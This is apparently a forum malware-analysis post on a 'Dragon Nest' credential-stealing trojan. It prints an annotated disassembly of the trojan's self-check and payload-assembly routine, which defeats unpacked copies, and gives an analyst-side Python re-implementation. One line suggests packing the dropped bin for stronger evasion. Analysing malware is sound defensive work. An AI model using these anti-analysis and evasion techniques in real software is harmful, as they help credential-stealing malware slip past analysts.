First, a note: this anti-debug trick only trips up some analysts through a momentary lapse of attention; it relies on cleverness rather than technique~
It did actually cause me some trouble at the beginning, but then again, I'm a noob~ Back to the topic~
This is a "Dragon Nest" account-stealing trojan.
1. It extracts a resource named "MWAI" from itself and drops it into the system temp folder as kb****.bin (each * is a random digit 0-9).
2. It then verifies itself: it checks whether the last 8 bytes of the current process's file are 7001000000010000 to decide whether the trojan is intact (as opposed to, say, an unpacked copy; this trojan is packed with PEcompact 2.x). If the check passes, it takes the last 0x170 bytes of the current trojan file and appends them to the bin file it just dropped, completing the assembly of the bin.
3. It loads the assembled bin and installs a global WH_GETMESSAGE hook to capture account credentials.
The assembly function:
Code:
00402A2E /$ 55             push ebp
00402A2F |. 8BEC           mov ebp, esp
00402A31 |. 81EC 6C010000  sub esp, 16C
00402A37 |. 8065 D4 00     and byte ptr [ebp-2C], 0
00402A3B |. 53             push ebx
00402A3C |. 56             push esi
00402A3D |. 57             push edi
00402A3E |. C645 C8 4B     mov byte ptr [ebp-38], 4B          ; build "Kernel32.dll" byte by byte
00402A42 |. C645 C9 65     mov byte ptr [ebp-37], 65
00402A46 |. C645 CA 72     mov byte ptr [ebp-36], 72
00402A4A |. C645 CB 6E     mov byte ptr [ebp-35], 6E
00402A4E |. C645 CC 65     mov byte ptr [ebp-34], 65
00402A52 |. C645 CD 6C     mov byte ptr [ebp-33], 6C
00402A56 |. C645 CE 33     mov byte ptr [ebp-32], 33
00402A5A |. C645 CF 32     mov byte ptr [ebp-31], 32
00402A5E |. C645 D0 2E     mov byte ptr [ebp-30], 2E
00402A62 |. C645 D1 64     mov byte ptr [ebp-2F], 64
00402A66 |. C645 D2 6C     mov byte ptr [ebp-2E], 6C
00402A6A |. C645 D3 6C     mov byte ptr [ebp-2D], 6C
00402A6E |. 60             pushad
00402A6F |. 61             popad
00402A70 |. 8D45 C8        lea eax, dword ptr [ebp-38]
00402A73 |. 50             push eax                           ; /FileName
00402A74 |. FF15 00604000  call dword ptr [<&kernel32.LoadLibraryA>] ; \LoadLibraryA
00402A7A |. 8945 FC        mov dword ptr [ebp-4], eax         ; ebp-4 = HMODULE kernel32.dll
00402A7D |. 60             pushad
00402A7E |. 61             popad
00402A7F |. 33DB           xor ebx, ebx
00402A81 |. 395D FC        cmp dword ptr [ebp-4], ebx
00402A84 |. 0F84 E4010000  je 00402C6E                        ; bail out if LoadLibrary failed to load kernel32.dll
00402A8A |. 8D45 A4        lea eax, dword ptr [ebp-5C]        ; eax = "athA"
00402A8D |. C645 A4 47     mov byte ptr [ebp-5C], 47
00402A91 |. 50             push eax
00402A92 |. C645 A5 65     mov byte ptr [ebp-5B], 65
00402A96 |. FF75 FC        push dword ptr [ebp-4]
00402A99 |. C645 A6 74     mov byte ptr [ebp-5A], 74
00402A9D |. C645 A7 4D     mov byte ptr [ebp-59], 4D
00402AA1 |. C645 A8 6F     mov byte ptr [ebp-58], 6F
00402AA5 |. C645 A9 64     mov byte ptr [ebp-57], 64
00402AA9 |. C645 AA 75     mov byte ptr [ebp-56], 75
00402AAD |. C645 AB 6C     mov byte ptr [ebp-55], 6C
00402AB1 |. C645 AC 65     mov byte ptr [ebp-54], 65
00402AB5 |. C645 AD 46     mov byte ptr [ebp-53], 46
00402AB9 |. C645 AE 69     mov byte ptr [ebp-52], 69
00402ABD |. C645 AF 6C     mov byte ptr [ebp-51], 6C
00402AC1 |. C645 B0 65     mov byte ptr [ebp-50], 65
00402AC5 |. C645 B1 4E     mov byte ptr [ebp-4F], 4E
00402AC9 |. C645 B2 61     mov byte ptr [ebp-4E], 61
00402ACD |. C645 B3 6D     mov byte ptr [ebp-4D], 6D
00402AD1 |. C645 B4 65     mov byte ptr [ebp-4C], 65
00402AD5 |. C645 B5 41     mov byte ptr [ebp-4B], 41
00402AD9 |. 885D B6        mov byte ptr [ebp-4A], bl          ; after the byte fills, eax -> "GetModuleFileNameA"
00402ADC |. E8 50EEFFFF    call 00401931                      ; GetProcAddress GetModuleFileNameA
00402AE1 |. 8BF0           mov esi, eax
00402AE3 |. 8D45 D8        lea eax, dword ptr [ebp-28]
00402AE6 |. 50             push eax
00402AE7 |. C645 D8 43     mov byte ptr [ebp-28], 43          ; build "CloseHandle"
00402AEB |. FF75 FC        push dword ptr [ebp-4]
00402AEE |. C645 D9 6C     mov byte ptr [ebp-27], 6C
00402AF2 |. C645 DA 6F     mov byte ptr [ebp-26], 6F
00402AF6 |. C645 DB 73     mov byte ptr [ebp-25], 73
00402AFA |. C645 DC 65     mov byte ptr [ebp-24], 65
00402AFE |. C645 DD 48     mov byte ptr [ebp-23], 48
00402B02 |. C645 DE 61     mov byte ptr [ebp-22], 61
00402B06 |. C645 DF 6E     mov byte ptr [ebp-21], 6E
00402B0A |. C645 E0 64     mov byte ptr [ebp-20], 64
00402B0E |. C645 E1 6C     mov byte ptr [ebp-1F], 6C
00402B12 |. C645 E2 65     mov byte ptr [ebp-1E], 65
00402B16 |. 885D E3        mov byte ptr [ebp-1D], bl
00402B19 |. E8 13EEFFFF    call 00401931                      ; GetProcAddress CloseHandle
00402B1E |. 83C4 10        add esp, 10
00402B21 |. 8945 A0        mov dword ptr [ebp-60], eax
00402B24 |. 8D45 E4        lea eax, dword ptr [ebp-1C]
00402B27 |. C645 E4 43     mov byte ptr [ebp-1C], 43
00402B2B |. 50             push eax
00402B2C |. 8D45 B8        lea eax, dword ptr [ebp-48]
00402B2F |. 50             push eax                           ; /FileName
00402B30 |. C645 E5 72     mov byte ptr [ebp-1B], 72          ; |build "CreateFileA"
00402B34 |. C645 E6 65     mov byte ptr [ebp-1A], 65          ; |
00402B38 |. C645 E7 61     mov byte ptr [ebp-19], 61          ; |
00402B3C |. C645 E8 74     mov byte ptr [ebp-18], 74          ; |
00402B40 |. C645 E9 65     mov byte ptr [ebp-17], 65          ; |
00402B44 |. C645 EA 46     mov byte ptr [ebp-16], 46          ; |
00402B48 |. C645 EB 69     mov byte ptr [ebp-15], 69          ; |
00402B4C |. C645 EC 6C     mov byte ptr [ebp-14], 6C          ; |
00402B50 |. C645 ED 65     mov byte ptr [ebp-13], 65          ; |
00402B54 |. C645 EE 41     mov byte ptr [ebp-12], 41          ; |
00402B58 |. 885D EF        mov byte ptr [ebp-11], bl          ; |
00402B5B |. C645 B8 4B     mov byte ptr [ebp-48], 4B          ; |build "Kernel32.dll"
00402B5F |. C645 B9 65     mov byte ptr [ebp-47], 65          ; |
00402B63 |. C645 BA 72     mov byte ptr [ebp-46], 72          ; |
00402B67 |. C645 BB 6E     mov byte ptr [ebp-45], 6E          ; |
00402B6B |. C645 BC 65     mov byte ptr [ebp-44], 65          ; |
00402B6F |. C645 BD 6C     mov byte ptr [ebp-43], 6C          ; |
00402B73 |. C645 BE 33     mov byte ptr [ebp-42], 33          ; |
00402B77 |. C645 BF 32     mov byte ptr [ebp-41], 32          ; |
00402B7B |. C645 C0 2E     mov byte ptr [ebp-40], 2E          ; |
00402B7F |. C645 C1 64     mov byte ptr [ebp-3F], 64          ; |
00402B83 |. C645 C2 6C     mov byte ptr [ebp-3E], 6C          ; |
00402B87 |. C645 C3 6C     mov byte ptr [ebp-3D], 6C          ; |
00402B8B |. 885D C4        mov byte ptr [ebp-3C], bl          ; |
00402B8E |. FF15 00604000  call dword ptr [<&kernel32.LoadLibraryA>] ; \LoadLibraryA Kernel32.dll
00402B94 |. 50             push eax
00402B95 |. E8 97EDFFFF    call 00401931                      ; GetProcAddress CreateFileA
00402B9A |. 59             pop ecx
00402B9B |. 8945 9C        mov dword ptr [ebp-64], eax
00402B9E |. 59             pop ecx
00402B9F |. 8D85 94FEFFFF  lea eax, dword ptr [ebp-16C]
00402BA5 |. 68 04010000    push 104                           ; MAX_PATH
00402BAA |. 50             push eax                           ; buffer
00402BAB |. 53             push ebx                           ; 0
00402BAC |. FFD6           call esi                           ; GetModuleFileNameA: get the current process's own path
00402BAE |. 53             push ebx                           ; 0
00402BAF |. 53             push ebx                           ; 0
00402BB0 |. 6A 03          push 3                             ; OPEN_EXISTING
00402BB2 |. 53             push ebx                           ; 0
00402BB3 |. 6A 01          push 1                             ; FILE_SHARE_READ
00402BB5 |. 8D85 94FEFFFF  lea eax, dword ptr [ebp-16C]
00402BBB |. 68 00000080    push 80000000
00402BC0 |. 50             push eax
00402BC1 |. FF55 9C        call dword ptr [ebp-64]            ; CreateFileA: returns a handle to the current process's file
00402BC4 |. 8B35 18604000  mov esi, dword ptr [<&kernel32.SetFilePointer>] ; kernel32.SetFilePointer
00402BCA |. 6A 02          push 2                             ; /Origin = FILE_END
00402BCC |. 53             push ebx                           ; |pOffsetHi
00402BCD |. 6A FC          push -4                            ; |OffsetLo = FFFFFFFC (-4.)
00402BCF |. 50             push eax                           ; |hFile
00402BD0 |. 8945 FC        mov dword ptr [ebp-4], eax         ; |
00402BD3 |. FFD6           call esi                           ; \SetFilePointer: move the file pointer to end - 4
00402BD5 |. 8D45 F4        lea eax, dword ptr [ebp-C]
00402BD8 |. 8B3D 14604000  mov edi, dword ptr [<&kernel32.ReadFile>] ; kernel32.ReadFile
00402BDE |. 53             push ebx                           ; /pOverlapped
00402BDF |. 50             push eax                           ; |pBytesRead
00402BE0 |. 8D45 F0        lea eax, dword ptr [ebp-10]        ; |
00402BE3 |. 6A 04          push 4                             ; |BytesToRead = 4
00402BE5 |. 50             push eax                           ; |Buffer
00402BE6 |. FF75 FC        push dword ptr [ebp-4]             ; |hFile
00402BE9 |. FFD7           call edi                           ; \ReadFile: read the last four bytes of the file
00402BEB |. 817D F0 00000100 cmp dword ptr [ebp-10], 10000    ; compare with 0x10000
00402BF2 |. 75 74          jnz short 00402C68                 ; integrity check: in the original trojan file the last four bytes are 0x10000
00402BF4 |. 6A 02          push 2                             ; /Origin = FILE_END
00402BF6 |. 53             push ebx                           ; |pOffsetHi = 0
00402BF7 |. 6A F8          push -8                            ; |OffsetLo = FFFFFFF8 (-8.)
00402BF9 |. FF75 FC        push dword ptr [ebp-4]             ; |hFile
00402BFC |. FFD6           call esi                           ; \SetFilePointer: move the file pointer to FILE_END - 8
00402BFE |. 8D45 F4        lea eax, dword ptr [ebp-C]
00402C01 |. 53             push ebx                           ; /pOverlapped = NULL
00402C02 |. 50             push eax                           ; |pBytesRead
00402C03 |. 8D45 F8        lea eax, dword ptr [ebp-8]         ; |
00402C06 |. 6A 04          push 4                             ; |BytesToRead = 4
00402C08 |. 50             push eax                           ; |Buffer
00402C09 |. FF75 FC        push dword ptr [ebp-4]             ; |hFile
00402C0C |. FFD7           call edi                           ; \ReadFile: read the 4 bytes starting at FILE_END - 8
00402C0E |. 8B45 F8        mov eax, dword ptr [ebp-8]         ; for the original trojan file this is 0x170
00402C11 |. 6A 02          push 2                             ; /Origin = FILE_END
00402C13 |. F7D8           neg eax                            ; |negate
00402C15 |. 53             push ebx                           ; |pOffsetHi
00402C16 |. 50             push eax                           ; |for the original trojan file this is -368 decimal
00402C17 |. FF75 FC        push dword ptr [ebp-4]             ; |hFile
00402C1A |. FFD6           call esi                           ; \SetFilePointer: move the file pointer to FILE_END - 368
00402C1C |. FF75 F8        push dword ptr [ebp-8]             ; /0x170 for the original trojan file
00402C1F |. FF15 70604000  call dword ptr [<&MSVCRT.malloc>]  ; \allocate a 0x170-byte heap buffer (for the original trojan file)
00402C25 |. 59             pop ecx
00402C26 |. 8945 98        mov dword ptr [ebp-68], eax        ; save the heap pointer in a local variable
00402C29 |. 8D4D F4        lea ecx, dword ptr [ebp-C]
00402C2C |. 53             push ebx                           ; 0
00402C2D |. 51             push ecx
00402C2E |. FF75 F8        push dword ptr [ebp-8]             ; 0x170
00402C31 |. 50             push eax                           ; heap buffer from malloc
00402C32 |. FF75 FC        push dword ptr [ebp-4]             ; hFile: handle to the trojan's own file
00402C35 |. FFD7           call edi                           ; ReadFile: read the last 368 bytes of the trojan file
00402C37 |. 53             push ebx
00402C38 |. 53             push ebx
00402C39 |. 6A 03          push 3                             ; OPEN_EXISTING
00402C3B |. 53             push ebx
00402C3C |. 6A 01          push 1                             ; FILE_SHARE_READ
00402C3E |. 68 000000C0    push C0000000                      ; GENERIC_READ | GENERIC_WRITE
00402C43 |. FF75 08        push dword ptr [ebp+8]             ; LPCTSTR lpFileName
00402C46 |. FF55 9C        call dword ptr [ebp-64]            ; CreateFileA: open the bin file just dropped in the temp folder
00402C49 |. 6A 02          push 2                             ; FILE_END
00402C4B |. 8BF8           mov edi, eax
00402C4D |. 53             push ebx                           ; PLONG lpDistanceToMoveHigh 0
00402C4E |. 53             push ebx                           ; LONG lDistanceToMove 0
00402C4F |. 57             push edi                           ; handle to the bin file just created in the temp folder
00402C50 |. FFD6           call esi                           ; SetFilePointer: move the file pointer to the end of the file
00402C52 |. 8D45 F4        lea eax, dword ptr [ebp-C]
00402C55 |. 53             push ebx                           ; /pOverlapped = NULL
00402C56 |. 50             push eax                           ; |pBytesWritten
00402C57 |. FF75 F8        push dword ptr [ebp-8]             ; |nBytesToWrite, 0x170 for the original trojan file
00402C5A |. FF75 98        push dword ptr [ebp-68]            ; |Buffer
00402C5D |. 57             push edi                           ; |hFile
00402C5E |. FF15 10604000  call dword ptr [<&kernel32.WriteFile>] ; \WriteFile: append the 0x170 bytes taken from its own file to the end of the bin file
00402C64 |. 57             push edi                           ; This completes the bin assembly: it first checks whether the file has been unpacked; if not (so it is assumed not to be under analysis), it takes the last 0x170 bytes of itself and writes them to the end of the bin file
00402C65 |. FF55 A0        call dword ptr [ebp-60]            ; CloseHandle
00402C68 |> FF75 FC        push dword ptr [ebp-4]
00402C6B |. FF55 A0        call dword ptr [ebp-60]            ; CloseHandle: close the file handle
00402C6E |> 5F             pop edi
00402C6F |. 5E             pop esi
00402C70 |. 33C0           xor eax, eax                       ; return 0
00402C72 |. 5B             pop ebx
00402C73 |. C9             leave
00402C74 \. C3             retn
Now imagine the analyst skims past this block: the bin they end up with is incomplete~~

If you also pack the bin while you're at it, the effect is even better~
Of course, all of this depends on the analyst's skill and attitude~~
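The trailer check and the append step from the routine above, re-implemented in Python as an added analyst-side example (this is not the trojan's code or the post's): it parses the two dwords at the end of a sample, rebuilds the bin from an intact sample, and shows why an unpacked or memory-dumped copy yields no payload. The sample bytes and the resource stand-in are constructed here, not taken from the real trojan.

```python
import struct

# Trailer layout the routine above reads from the end of the trojan's own file
# (values from the post): the last dword is the marker 0x10000, the dword before
# it is the length (0x170) of the block that must be appended to the dropped bin.
TRAILER_MAGIC = 0x10000
TRAILER = struct.Struct("<II")  # (block length, marker), little-endian


def appended_block_size(data: bytes):
    """Length of the block to append if the trailer is intact, otherwise None.

    None is what an unpacked or memory-dumped copy produces: the dumper rebuilds
    the PE from memory, the overlay is lost, the marker compare fails and the
    trojan takes the jnz at 00402BF2, leaving the bin incomplete.
    """
    if len(data) < TRAILER.size:
        return None
    size, magic = TRAILER.unpack_from(data, len(data) - TRAILER.size)
    if magic != TRAILER_MAGIC or size < TRAILER.size or size > len(data):
        return None
    return size


def assemble_bin(resource: bytes, sample: bytes):
    """Mirror the routine: dropped "MWAI" resource + last `size` bytes of sample.

    The appended block includes the 8-byte trailer itself, exactly as the
    ReadFile at 00402C35 reads FILE_END - 0x170 .. FILE_END.
    """
    size = appended_block_size(sample)
    if size is None:
        return None
    return resource + sample[-size:]


# Constructed inputs (not from the real trojan): a fake PE body, a 0x168-byte
# block of filler and the 8-byte trailer, plus a stand-in for the resource.
RESOURCE = b"MWAI-resource-stub:" + bytes(range(32))
INTACT_SAMPLE = (b"MZ" + bytes(0x80)
                 + b"\xaa" * (0x170 - TRAILER.size)
                 + TRAILER.pack(0x170, TRAILER_MAGIC))
DUMPED_SAMPLE = INTACT_SAMPLE[:-0x170]  # overlay gone, as after unpacking/dumping

if __name__ == "__main__":
    print("intact:", appended_block_size(INTACT_SAMPLE), "bytes to append")
    print("dumped:", assemble_bin(RESOURCE, DUMPED_SAMPLE))  # None: bin stays truncated
```

Running the same check over a sample before unpacking tells you whether you need to carve the overlay first, so the dropped bin can be completed for analysis instead of being left truncated.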
